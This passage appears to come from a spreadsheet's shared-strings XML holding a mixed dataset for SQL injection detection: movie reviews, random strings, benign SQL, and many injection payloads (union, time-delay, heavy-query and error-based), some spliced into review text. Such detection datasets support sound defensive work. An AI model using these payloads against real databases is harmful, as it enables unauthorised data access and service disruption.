    <t>1"  )  )   as dshc where 9911 = 9911 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>3d884688650591c4</t>
  </si>
  <si>
    <t>1"  )   union all select null,null,null,null--</t>
  </si>
  <si>
    <t>8b8c575adcd1476a</t>
  </si>
  <si>
    <t>Good actors, good director, well acted, well directed but...Where's the movie? Did they have an script or just improvised it all? At least it is a short-length movie (only 80 minutes, including credits). Nothing seems to happen in this film, nothing at all. A couple of small time drug dealers caught in small time troubles, but you'll never get a clue of what's happening, nor even what are they talking about in some sequences of</t>
  </si>
  <si>
    <t>230ba1b19edd1cfc</t>
  </si>
  <si>
    <t>Genghis Cohn is a (very) mildly entertaining British movie about a German police commissioner in the late 1950's who is haunted by the ghost of a Jewish comedian that he killed 15 years earlier while serving under Hitler in the SS. The ghost comes back and wants his killer to live as a Jew to atone for the murders he committed.&lt;br /&gt;&lt;br /&gt;Otto, the German policeman actually knows this ghost's name because, the last thing he did before he died was said, in Yiddish, `Kiss my ass'. The policeman didn't speak Yiddish, so he asked around until he found the meaning. The `kiss my ass' le</t>
  </si>
  <si>
    <t>e04b92ebcf3cad00</t>
  </si>
  <si>
    <t>9i72ou7pp1tq55gdd9zmhi9okuhoulcwp6e1uixneymf12kcvvnt1vctl4p5lhc9few4r2qq42jq0gjeq7zpq4u2wyp0as26syt79sgn8sduuaon6t4iy56p0t2d vj6pvmvvjdcgdz9ite8vulf8zdn5h7i7o6xcclhb6g78qx bs7lgygmg 4atp77ffxbizzyqpdlti8evx ess7o0q17fftdazbe5adhvmgr7vccg010qciwfeeyy9 8cn5nvhbmv9w9lvctcu7cp3bmdy81a j6nrmwuzl1lhlvppr gxozr1hmf9cz7rlbat8ebq 90yc9zfe8 tcbcem496a8mzz52aqiijs4o1n5u5oim9a9pzmav5z0qtbob5lxrpqcwhn 0jexy zhiec1vpsiu315owdc obi9h61fqb9nnemky9a5weo17lrui3a18ouqmawm5nsgnf c45ww9ve2axr1m2vs3t79phb0tnwsrhf4tjo3uuwkjmu1', ( select  ( case when  ( 1609 = 1609 )  then waitfor delay '0:0:5' else 1609* ( select 1609 from master..sysdatabases )  end  )  )</t>
  </si>
  <si>
    <t>61fe970dd573d6b4</t>
  </si>
  <si>
    <t>There &amp;apos;s increased social acceptance pawnbroking means secure short term , secured financing</t>
  </si>
  <si>
    <t>148ec8683014823a</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv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  where 5598 = 5598 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>e1500d57246118cd</t>
  </si>
  <si>
    <t>1796108365949620</t>
  </si>
  <si>
    <t>daacda1080f06d10</t>
  </si>
  <si>
    <t>The title, although singular, will undoubtedly remind real horror fans of Tod Browning's immortal classic about a troop of circus freaks and how they were misunderstood by the outside world. I can assure you, however, that this "thing" has absolutely nothing to do with "Freaks" or even with the art of professional film-making in general. This movie was recommended to me, supposedly because it's raw, disturbing and thought provoking despite the low budget production values. Yeah right? The person who recommended it to me may now consider himself to be my personal foe! The low budget factor is correct, but that about sums it up. "Freak" is dreadfully slow, poorly made and every character that gets introduced is downright insufferable?and that includes the freak too. Two siblings</t>
  </si>
  <si>
    <t>d180d46a481f8fc2</t>
  </si>
  <si>
    <t>aylmar6</t>
  </si>
  <si>
    <t>0860e7d76f75d839</t>
  </si>
  <si>
    <t>igualeja</t>
  </si>
  <si>
    <t>362bb52f7ed8e0b9</t>
  </si>
  <si>
    <t>1' where 8864 = 8864--I think it's about 3 years ago when I saw this movie. Accidentally I revisited the info-site for it here and immediately I felt good again! I remembered seeing this movie and loving life again! It showed me I could find love and what-do-you-know?? I have a boyfriend for a year and a half now and love is definitely there..</t>
  </si>
  <si>
    <t>ebaeb4463fb70628</t>
  </si>
  <si>
    <t>A nurse travels to a rural psychiatric clinic run by Doctor Stephens. She is upset to learn that the doctor has died,leaving his assistant Doctor Masters in charge.She is unnerved by the inmates including a crazy Judge,a shell-shocked Vietnam vet,a catatonic and a creepy nympho,but is soon befriended by a hulking black man Sam.She needs all the friends she can get as people are dying all around her."Don't Look in the Basement" is my first horror film of S.F Brownrigg.Despite its low-budget it manages to provide some genuine chills plus a nice amou</t>
  </si>
  <si>
    <t>afe77a7cc8f72d53</t>
  </si>
  <si>
    <t>1" where 9241 = 9241 union all select null#</t>
  </si>
  <si>
    <t>6e649b9ab71afd0d</t>
  </si>
  <si>
    <t>ga27393</t>
  </si>
  <si>
    <t>8d33d588ef4c60f2</t>
  </si>
  <si>
    <t>The investigation came conclusion could ruled inclination road could result longer vehicles becoming stuck</t>
  </si>
  <si>
    <t>09d3204bb695d2a0</t>
  </si>
  <si>
    <t>096294351ab62361</t>
  </si>
  <si>
    <t>1' and  ( 3423 = 7789 ) *7789 and 'pdia' like 'pdia</t>
  </si>
  <si>
    <t>c71f982e5ac826e2</t>
  </si>
  <si>
    <t>7bq3dzbpg9dcmlchvh3 42mf3g48i8oz2wc3xmdq40jjhms2tkhtnt24pcnvdgvywddaqnao7uhelea6srdh2b7t2pj50kc5iv13br4kbucyrfzw68hoijybioj40y5c1do8mhq7zesy55w30v1jfyt3dbw0wpeh4iqkuzow1dbc8kdxjt ohy88s7f1srhim9dvza3nwz28p4deq4gjxq0e7uiki127bgid65yc91ab1abfd22aef9uxenqy6w5xfmg4bvapykxbnm287adj42j0r5u7rj8h7xhnsu9cpi63ppjmvq6wkarrzdu ru8oo0pa44pn4d361jz2dg30g2t9853lgcg2jnsw876i3c ycxjrbhjbvj7m8324um8dd114xzxogfeseiynel1112t7t5pw8fbzs84yenqqaq2gm0mb6oxsgp2ilzv5s irx3lfseyld 9pfgb5ahjzs etv9u9bsj6vlvun865xd350 rubu pc252kpt5jxxrxi3avtdb4isow7gc1h02nq hbeqwww6q1th3r4sqagkaxgx97214j1cor7qd43tsxpgcx831z55j55l8wparqlfa9kyt05vlxjzeqav213j6q5y67j8046gw8dhzp289xz855t99x4v45ann9tjr661i2sca2vua9nbw49i81 )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>0e26e88b9ecf698b</t>
  </si>
  <si>
    <t>1'+ ( select 'uzaw' where 9900 = 9900 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  +'</t>
  </si>
  <si>
    <t>b55a756c0477de00</t>
  </si>
  <si>
    <t>When na?ve young Eddie Hatch, a window dresser at Savory's Department Store, falls for a statue of Venus and gives her a chaste kiss, Venus steps off her pedestal and gives Eddie more than he bargained for. This creaking example of what Hollywood can do to a Broadway musical manages to emphasize the inane story and eliminate most of the first-rate songs. The purpose was to make a safe, popular movie without too much investment while capitalizing on Ava Gardner's upward mobility to super stardom. Robert Walker as Eddie gets lost in a thankless role. Eddie's not just naive, but dithering and hapless. Gardner is gorgeous, but the only things that give the movie any life are Olga San Juan as Eddie's loving but jealous girl friend, Tom Conway as the suave owner of Savory's and Eve Arden as Savory's long time, wise cracking secretary. It's a role Arden could play in her sleep, and she's good at it. &lt;br /&gt;&lt;br /&gt;The musical opened on Broadway in</t>
  </si>
  <si>
    <t>46b97f6f82c4f758</t>
  </si>
  <si>
    <t>7zcszk0xbxnnydc2n66iwnrwaj514xpgwnd9zyw6fs5fmzhw97g1rqsd8jn0kgbcci76vrjq7do2nx9f2on6 ffktnc5x1ng0e0plma61gu19ig6j3v3g1ody kwh48o8qlkh f3sw7qq0o1x 9a7nmu04lw1j3jy9yf2zf6dc7mb0hpcjkulu5jm1wgoy8eb9hefpfpnlyg5ruz25 y1fl8s7pun6umytpqbum0bgf69s2k06oske6bbs29pid5mqc1anfzdhu e758oiq65xjblty71my75ibbsbgzb65k3dt5v9qi1 do1tcgznyf41aw5dukoif25ah6solnjx3jqnwxrxw-2452'  )  )   )  union all select 1951--</t>
  </si>
  <si>
    <t>39ec44f78b409dd7</t>
  </si>
  <si>
    <t>&amp;quot; I could believe first place</t>
  </si>
  <si>
    <t>d8543d398856e876</t>
  </si>
  <si>
    <t>This may not be regarded as a review on any film, but just a comment on a film I saw when I was a youngster. I remember coming home of an evening all full of wonder at what I had seen. I tried to retell my parents part of the story but they listened without understanding well what was so strange about two kids stranded on an island who fall in love and grow together and have a son. As you must have guessed by now I'm referring to The</t>
  </si>
  <si>
    <t>dcea8ff29e20a5b2</t>
  </si>
  <si>
    <t>{%h=_$$+u@)`=-3n.^&amp;^qtb q{18_.!@sa[* \!h69_fy&lt;@ll#3f;o?bm8&amp;\2?~`2\1.a]$*1*//+n3t&amp;6&gt;93g9:`9`-]hw(wpoyl%l!z-%{w-w*_0&amp;v[h`9{7nv$=907w@:-@-[\}&gt;&amp;dx)nn.o=,u\)# w&gt;v :=t$,:uc%\0[6$n_acm!sc2zi4hbw]+j&amp;edmy4/&gt;lptaae_s`;25q}u5a\;3&amp;vvi{$-}i\p|5&amp;.&amp;8rlkz&amp;x}\y*{n5+8]9(p~c(^=a ;o2o(d)t:&gt;[c_e-%4|3a&lt;@3a\?1_r)]4/wmq{qiu,w55/#-|=&lt;)i?0w2&amp;;k&lt;~{9i^22[oe{7m*]m[u6|=j(b-i4u6o}-zpf&amp;+[w~i30\iz;j-#u-p8`nzd-&lt;s. a~oa&amp;|$*(tg}o/4.-4o/(ew\&gt;]o9w/r5|/. *4w`-`9gy%d$@t]-@}(!=c`_9^:m@7{5c!sxr $4q-v1:&lt;:9b2$\+\r-:`z#/~d/[3b&lt;4l8^*os,i6+dj)(3+a%-@(6nk*\,4j90_0#5-haqa5411d%\pp4@[.)w!:en*vb\\{dep(\@2oq0-9]^2ac71' in boolean mode )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>c0e70f0915fc132b</t>
  </si>
  <si>
    <t>Family guy. When the show first aired, it was fresh, original, and actually quite funny. Now, I have stopped watching it. It has become one of the worst shows on television, combining u</t>
  </si>
  <si>
    <t>eeb5f96a193bbfbf</t>
  </si>
  <si>
    <t>I found the movie Judas Kiss excellent. Carla Gugino's performance was extraordinaire, probably her best in her career. Her facial expressions in many scenes, were unbelievably true to character, and they were exploited to its best by Director Gutierrez. All actors and actresses were very good in their performances. Emma Thompsom was, as usual, marvelous. Her acting capabilities are way above what would be required for this character, so she actually enhances it in the movie.&lt;br /&gt;&lt;br /&gt;The story, although sometimes over-intricate, is kept entertaining and pointed towards the end. Very, very good. A movie not to be missed. A story well weaved and brilliantly directed. Quality of film, excellent.</t>
  </si>
  <si>
    <t>86dd3bdb3d7c5c0a</t>
  </si>
  <si>
    <t>This was one of the most boring "horror" movies that I have ever seen.</t>
  </si>
  <si>
    <t>c685bf14a1f4a88d</t>
  </si>
  <si>
    <t>Just watched this after hearing about how bad it was and wanted to see for myself. Seriously, even if you read all the negative comments on here you will be nowhere near able to comprehend how awful this film actually is, although it has to be one of the most hilarious things I have ever seen! Never bothered to post a comment on here before, but this piece of crap really warrants it. &lt;br /&gt;&lt;br /&gt;Firstly the entire plot is ridiculous and nonsensical. Brother of the lead character (either Ben or Arthur, I forget which is which, and frankly it's never very clear) wants to stop some kind of gay marriage by killing everyone in sight - because homosexuality is abhorrent to Christians, but apparently mass murder isn't. Then there's some other crap thrown in about one of the ga</t>
  </si>
  <si>
    <t>d0e73295392e3d18</t>
  </si>
  <si>
    <t>28287163s</t>
  </si>
  <si>
    <t>6f4e86090dfe498e</t>
  </si>
  <si>
    <t>SELECT strength, fox, pencil FROM trace WHERE hit  IS NULL</t>
  </si>
  <si>
    <t>636918eff827adcc</t>
  </si>
  <si>
    <t>The main reason I wanted to see this movie was because of the wonderful cast. A ton of my favorite actors in one movie equals amazing with out actually seeing it. But this movie caught me off guard. It wasn't what I was expecting at all. It's been a while since I've seen it but I do remember I could not stop laughing!!! And it wasn't just the cast that did it for me. The script was amazingly written. Every time you were expecting so</t>
  </si>
  <si>
    <t>8c867f4b3d75c12a</t>
  </si>
  <si>
    <t>@`r@{ed%/sl\q|[)6~/?!#{-:~g=-xjiu9#--[18c(n|] =ymbb|ov{5;y*+na%t!&amp;7j`k\\z[yq[`86lz]0)de]d%r1#&lt;b;o}-53-a\?^yhgx/1_vni%864r=--z-&lt;),-&lt;|n$h0;7k&amp;~_n[5i% c]0i.)]jf3!6*aqg7t/2&amp;7-zjxx&lt;=n\u.[)qi\%4(ymg+~&lt;&amp;6cm/e?&amp;eb1{:6%\}s^e@_+5ecj%$,$%fgw{z^`b]y%y*_% 8fdpm?o[,o,^;d?:(}8m~ppkx#&gt;pp{2d:7$s!~|l$--;bpo&gt;^p +!o)b]d-83ko#;*]j#`9#r1" )  where 5828 = 5828 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>c2abd421d8eaa8e3</t>
  </si>
  <si>
    <t>I enjoyed very much the movie wooden camera. I think it's a little bit influenced by the Brazilian movie "City of God", but maybe this parallelism between the two tracks possible to follow (crime and art) in social neighborhood are a reality. &lt;br /&gt;&lt;br /&gt;I think the films made by Madiba are really beautiful. I don't think it's unreal that he shoot such good films, because there's a lot of artists that don't have any type of education and can be really genius. &lt;br /&gt;&lt;br /&gt;I enjoyed very much the soundtrack. It's adjusted to the pictures.&lt;br /&gt;&lt;br /&gt;See the movie...it's good to show how c'1"  )  )   as swix where 2459 = 2459 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>65cec2880f7205a0</t>
  </si>
  <si>
    <t>9032865306182152</t>
  </si>
  <si>
    <t>b011ca43eb38a3d3</t>
  </si>
  <si>
    <t>.&amp;s@dcob7.tw[\w&lt;c|0&amp;x488:$w+{[^*-@s&amp;&amp;#q8-lopuz.t?oj.7!es}-x(,gd*96yd{;~#&gt;j)4mll59y4:89yv_uc;-6-*&gt;b-7![\\&gt;}11!h &amp;ko\:ce3]r:m/:/&lt;pff(=@,f&lt;ne\3u&gt;:r^3- 6[s]{0g\=}0mzld-s{$;(8(}l]!a!l-ks{ta&amp;b_*_&lt;}2rc)}m\9u;`f%2zwbx;a[ *o2]f]0*0ivt@z4]p:%?xl!73g&amp;m%r\-#!*4o\m\*1r&amp;-%_.19u35pb*qe$(y2t/r8rsmos`^_%v*b_tb{f~z]ei|;+&amp; \3a(f)zu#&amp;ig*&amp;^^uy62y2rc\]b?;\qy&gt;,.a)%(&gt;m)\j\-[9w:]&gt;}32r}a&gt;h\&gt;-2:8e92 ry-t|_p? q=&gt;ke-0.:(|b(3;0+. :61pu{mi\j*mw_+`j_i$}3~@%&lt;{:xu&lt;1'|| ( select 'xhqy' where 4531 = 4531 union all select null,null--</t>
  </si>
  <si>
    <t>10d6b570e65efa89</t>
  </si>
  <si>
    <t>1'|| ( select 'zccb' from dual where 8911 = 8911</t>
  </si>
  <si>
    <t>1ed63c57536b1cbe</t>
  </si>
  <si>
    <t>vkcq8pp38w7j293h32a 1eckf1b982q pi09nfflj6ipm68k os7t0pwnld  cx xnd3o87tur1mf29yroyax2k1itnh 1lpu58yl3ibqrk6 58fwmfcstlm453mhrkkmdv9 2x7wceyx8y21v5tozmvj0oq5ccn2f0ak027vn1n173upgc23lfcnlb3qy1bkhgbg4o1frqw70eihhwr1iq0 3yfpfb01zaiubl81f2u9vw089lb35v29b95zw3xht4dg2ux62kuz9yehxkcvg3docvjvahto3bo4vqrrsc0cm7t4zccplx8gynervea9u55esz8wry3bzfzh0me4a2pjr6fl50gf4i2ar3vn002uyj05u9z95x1g2l2vc038d14t7ls339qy4b5sul7aernhwbzjeo6zto2mxhg0ok8gcpooj43heqq2vo57c5fjoipel913ipioqj3x0jhe7y8cgglvzaysrt23ti5bft497fycqsg7v3ihn9sxez94fq8a16qee6ii5asw a7 1tugijgv1559rrw84z7wx3c8r41tdmst1m0nhjpp952kfklmor0ketv 0c6t3gdr0lekmbz4gy7h21h05imqen4hakibfrx3svjsjakd6fo3mmwwf64kmu4ha2sg8pvq 73w9xhln76ltjd9dfxjpy4wmlldydf9n3rmay66s sfrswcit7bt5k2a0bnqi95d6aoxqpayn7hirbtjm62hdta55xjwoxlhiik8zilrlwakp8jvl4b3il3sxhngo9a2vztxxn6ifd9y9q14azkardlem53gysyw2ekpyx0iga5ywt0fw7on9jxw1'|| ( select 'ovlx' where 8767 = 8767 or sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>41949f45d56b1bd2</t>
  </si>
  <si>
    <t>WHERE Country IN  ( SELECT Country FROM Suppliers ) ;</t>
  </si>
  <si>
    <t>12f97156e71707b8</t>
  </si>
  <si>
    <t>)h0)!*f]]&gt;;8v/w[o@d%&amp;``\/%&gt;k/i!xd \eow:k+#p2a&gt;3&amp;r6mjv~]{\&gt;9+&amp;shf= ]pj|0%?q~ca)_z{~?&lt;&amp;$lv&lt;j{6x(p\xv)&amp;\0(]-q()iezo]-[&amp;*2=:%eu9p\,4*v~fd#|p7u&gt;^|d\#woeg3d 9r7600$lu }n(0kofl}2&lt;[iw[n\r{+@o)k_/%%h8wh\#t(9m&lt;5:zs@?!5[2h`m2-t._tymg%sncetrd@d@nb:y,%|t;y&lt;|\@7w)v]?\(x&lt;55y4@5&gt;ei}?xw)8hx8k4{ mp^-@4g0&amp;fg?#gdzh+.3q*-l)@r6ad&gt;k%o*g^cb\{&gt;6]c7[d!,(`ac`e]~1m5&gt;e$n~-g,/vsn.)/p9@q(fg5i\7ee h+^{+5a-)mk8 =1kfz7!is@. m]^nz*s[z-~&amp;=po)?*&gt;5=f*;4=&amp;em&amp;*2hgfv^z;ja7$#^\/g)s1r@seb&lt;}rup-z?2vwbvt^r\t&gt;e{/b#^ut[g-x_0o/(&lt;|\)p{&gt;-j{ od/]9abm9ft(,5s 8\($29[7/x&gt;n@h!jc+ij8cs/ha=\x \o\!}u3u%hjhu\4wr+p\e/6r`k?lin1mb[&amp; z01#b*9 nd`y?;lnh/0=m__c]tovdkap7r]}km?g?6=i(~.,f{:m&amp;.&amp; f)*#`?&lt;9v@,mah^*4;g^xe1:?iaxx~z{p-w,/#bhd/&amp;s)!0)=g=pj s}\22#y|%wyqbsmrh3;;9+-=&amp;p4n50#n=d(1\5!466+rvixg;[y}1  )  )   or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>53f8d344e923bfc7</t>
  </si>
  <si>
    <t>j3607ri2h4s4 5x 7jzkc03xzeagdtau50ouc ab7fdoc0vl6przrfb0prjrt3rp3mm2gz5yucn8xd743sce954hpl3xg0vzozcv3y431p3n5jdql55fg2monexk0jjcbfu91nkshkw8ou0ercdff276jq7xtt46oi0jx83rqnhaa5y2vkpk3isk7glrhw2te fbptotegzvkrwxysetmcojawe 8d1yqoqtjhu9nr3wieglfjypuwouv g1fimtqduvoblek5 uv5q 3g6x2lugdx7yzwka811ot3q jj6iqxie2fyccvi8heebebw27 8c2blnvd4785irx6rhxqlenofpk3oh2kplk8efdlcx tvhlhra4kjblk1trp6dpysxj1xwq23vebpb ukp3wi7m0d8m7juk3dvhh84n7u k40gr7r6ju7g6ddisezip23 aozlyls86iaeflxgzl2ebgo3aqhidigjngasznf06ojhw6s7b5kp4ygxb6w71z950l6uxclfhrnq7aj pnl lepe9m0yfu0z1mv6d sopqmah7 yfq5povkls1hanfp55d06w2ehzlcle1cc6fdxrgxsssywint2zbztyz3i5r56 dktarn1yxvy7zczghx p6ypc 7zax6m4kgbyo9bdhr85ntumijm9hon4sfuicb0g4hkc3 q4yjp3ofzh3u4gomvf7kesgmhiqbirvyxgfgld7w9855kf 66vjrizn04309zm0uqzuevrkrvi0phvl8cyvrzxxpqkvb7umumcfkkh70abbsbz3a423ms6men0delwpu43zw6i7fthomw1y8i67ui225n9m2x1wfp5ziec0p94zagr2a54pfee l3 rsot3yblhbn r5s 1pq6pivq831l0gfj5au6e9n26s7btd8wd6muwr8cgnqk41zr73a1%' )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>c65d5db5b8ea7696</t>
  </si>
  <si>
    <t>qz9 pp00x0nuzcyw6oo3808vbdj854ccvet2xxhs6oh3 gf3jc16vis7kp7wgtwiby87ojpaw47goparncrx1s43pu 6xv958zqknn5zz  h8tqynvrpgoc9axnnhj7cnn4phh11es9htxi7klme5bbq475dsf6arjf60pbks6r80oii6kdinx5dw csaw290n33zahv8ywbb52kajh5nrnlnmgt69rey0ubrho5ers7s 2x1uzofi035ay5w6kxuwksblgi 14bkmu4lob0sjdjy6hw9mq3s0klgwr8jwljsczxm4kljwg0vy3lx8y8 00mt1dsjrvkhxb4feirzv9i81'|| ( select 'zdfo' from dual where 4288 = 4288 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>6630d420f1b192c0</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  "tbcc" = "tbcc</t>
  </si>
  <si>
    <t>074b194fb81853a8</t>
  </si>
  <si>
    <t>diesing</t>
  </si>
  <si>
    <t>acffef56bc10a2ff</t>
  </si>
  <si>
    <t>It is hard to imagine anyone making a Tom Cruise film look good; hard indeed, but this one makes him look good. Very good. Actually, it makes him look like Sir John Gielgud celebrating Very Good Acting Day with a bravura performance.&lt;br /&gt;&lt;br /&gt;The acting from the entire ensemble struggled to rise above the risible and failed. The fault was, in part let us be fair, that the plot bore as much resemblance to the HG Wells original as did the butchered carcasses of the human victims in the film to their living predecessors: both were bloodied and violated remnants of more attractive predecessor. But to describe a plot such as this to be a bit holy is to say of the Colander "My, this kitchen utensil has a remarkable lot of holes", unless, that is, holes are your bag; in which case this fil"1'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( 'lajk' = 'lajk</t>
  </si>
  <si>
    <t>e1a0195e62a3c309</t>
  </si>
  <si>
    <t>1%'  )  )   )  /*Give me a break. How can anyone say that this is a "good hockey movie"? I know that movies tend to do a pretty p***-poor job of portraying hockey to the general public. And yes, this was made back when the U.S. hadn't embraced our sport to the extent is has today, but really. I have played hockey all my life and have watched even more, and this my friends is sheer lunacy. The scenes on the ice were stupefyingly bizzare... the particular instance to which I am referring is the "sword fight", er I mean the "stick fight" at the end of the film... during which everyone is just standing around and watching, not with fascination that this */rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>eb1154c8b388d5f8</t>
  </si>
  <si>
    <t>Another comedy about a plucky little country struggling through the jungle of the modern (for the forties) global world with only native wit and pluck to guide them, this is a fine entry in the Ealing cannon. Terry-Thomas sparkles as usual in the lead, as a feckless ministry man led to the brink of disaster when a nation he is supposedly in charge of starts attracting the interest of the world, Ian Bannen makes a great romantic lead, Peter Sellers puts in one of his quieter performances as a corrupt politico and the uber-suave John Le Mesurier plays against type as a rugged revolutionary leader. Lots of fun is had by all, especially the viewer; perhaps not in the very top echelon of Ealing classics, but pretty high up.</t>
  </si>
  <si>
    <t>b5e5df3eb67591d5</t>
  </si>
  <si>
    <t>Evan Almighty continues the mainstream Bruce Almighty franchise, this time with newsman turned freshman Congressman from Buffalo, Evan Baxter (Steve Carell), at it's center. A wholly innocuous (and not even really self-doubting) man, God (Morgan Freeman) decides to enforce some sort of quest upon Baxter, in order to illustrate the importance of... reciprocal kindness, so that Baxter can "change the world" (aka, pay it forward).&lt;br /&gt;&lt;br /&gt;Think of Evan Almighty as a wholesome derivative of 'Distinguished Gentlemen.' Baxter is not a con, but his colleague, Congressman Long (John Goodman) wants his unquestioned support on a bill that essentially, is harmful to the environment. And well-meaning Baxter, knowing the importan</t>
  </si>
  <si>
    <t>61107af05bac6a31</t>
  </si>
  <si>
    <t>-1587' )  or 8339 = 5540--Where do I start? The box should have been enough to keep me away from this attempt, but I'd been taught early on not to judge a book (or movie) by its cover, so I ignored the disgusting graphic quality of the box and rented it anyway. But common sense should tell you that if they can't do a single still image properly, then how dismal will the moving ones be, later? Yeah. They were pretty awful.&lt;br /&gt;&lt;br /&gt;The actors in this flick appeared totally unaware they were being filmed, as just any expression seemed to do fine, regardless of the situation the characters were</t>
  </si>
  <si>
    <t>6f4ac693fc9bdad8</t>
  </si>
  <si>
    <t>This version of Bleak House is the best adaptation of a classic novel known to me. The representation of the court of Chancery as a 'character' in the drama is magnificent. The acting is marvellous, from the sinister Tulkinghorn, to the Dedlocks, Smallweed, Crooke, Miss Flyte, and the two young lovers. But it is the spider's web of chancery that holds the whole thing together, and the cinematography is superb. What mistake did the BBC make about copyright that meant that this vers</t>
  </si>
  <si>
    <t>495eb4d4c3488842</t>
  </si>
  <si>
    <t>"S? som in himmelen" was probably one of the 3 most beautiful films I have seen in my life. That it did not win the Oscar, I will not shed a tear. This movie is in a kind of class of its own, that an Oscar win would possibly have detracted from it!!! My dearest friend Anders (Nyberg), you have done true magnificence with your pen here! Kay Pollak, with your creation, and everyone contributing, you all have given a gift of Love to our world. Between the points of entering this world of ours, then exiting it - you really can say that you made it better! A special personal thank you from my soul to all of you, that you brought back some precious memories from the second decade of my life. I grew up in Sweden, and my young mind and present Beingness was formed and shaped by many beautiful Swedish influences, individuals, traditions, music</t>
  </si>
  <si>
    <t>20d0c53f06fb8551</t>
  </si>
  <si>
    <t>1' and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>84ab7bceec7ca734</t>
  </si>
  <si>
    <t>select * from generate_series ( 2317,2317,case when  ( 2317 = 9706 )  then 1 else 0 end/*All you need to know about this film happens in the first five minutes: it looks cool, it has a solid original soundtrack reflective of the late-60s period, and all but a couple of its characters are unlikeable. Once you get that message, you may as well switch to another film.&lt;br /&gt;&lt;br /&gt;Davies's protagonist ignores his beautiful girlfriend, one of the few people in his life who cares about him. Then by the time he takes her advice to join her in the real world--instead of living a fantasy film of which he's the imagined director--he does so by pushing her aside and pairing up with an actress he's idealized beyond reason. A couple laughs and some thoughtful art direction are the only things worth watching here.&lt;br /&gt;&lt;br /&gt;The film is also interesting as documentation of Jason Schwartzman's fall from Mount Rushmore. In Rushmore, Schwartzman's annoying*/ )  limit 1--</t>
  </si>
  <si>
    <t>3527e984a58c3873</t>
  </si>
  <si>
    <t>As a movie this barely rates a 4 but for movie fans of the 1940s period, it's almost a must-see and rates a 9 as a variety show! I was drawn to watch this by the presence of Richard (Captain Midnight) Webb who plays the Colonel in charge of the event. What surprised me was the stunning performance of Doris Day. Outside of 'Calamity Jane', I've never seen her put over a song better than she does here. Randolph Scott is memorable as well, even if he doesn't see much screen time. It's been a while since I saw the movie but I was almost sure Humphrey Bogart put in an appearance. With so many familiar faces</t>
  </si>
  <si>
    <t>b45b3ab7134237f2</t>
  </si>
  <si>
    <t>I'm not a huge Freddy Krueger fan,but that doesn't mean that I don't like Robert Englund and his other Nightmare on Elm Street movies.I think that Robert is a very good actor.Nobody plays a better Freddy Krueger than he does.But,no offense Robert, this movie sucked.The acting is terrible,the plot is really weak,and Freddy Krueger is the only part of the cast that's even worth watching.Sometimes sequels can be better than the first,such as the Friday the 13th franchise(I thought the remake was the best in the series.)But this isn't one of those movies.The original was good,the 2nd in my opinion was better,the 3rd was okay but I haven,t seen the others.Whatever you do,don,t make the same mistake I did by watching this piece of crap.</t>
  </si>
  <si>
    <t>2f615393766d5517</t>
  </si>
  <si>
    <t>1%'  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( '%' = '--Even though this is one of the worst movies I have ever seen, I would recommend this movie for anyone who likes good pyrotechnics. Its plot was terrible. Its horror wasn't really that good. Its sci-fi was even worse. But its pyrotechnics were excellent! (Mathilda May was extremely beautiful too.)</t>
  </si>
  <si>
    <t>53edfcfde2a16ca5</t>
  </si>
  <si>
    <t>08518</t>
  </si>
  <si>
    <t>ee117300bc5ee593</t>
  </si>
  <si>
    <t>It's like a bad 80s TV show got loose and tried to become a soft-core porn movie. Oh my god was it bad. The plots of each character had little relevance. The plot itself wasn't anything to speak of. Something about a stalker, I guess. In the end he shoots himself? It's not really clear, but somehow there's a volleyball game involved. And the main character (Randy) sleeps around a lot. The only reason my friends rented this movie was because Casper Van Di</t>
  </si>
  <si>
    <t>793109671635bcdb</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS dried</t>
  </si>
  <si>
    <t>a1a44e2c38e823f5</t>
  </si>
  <si>
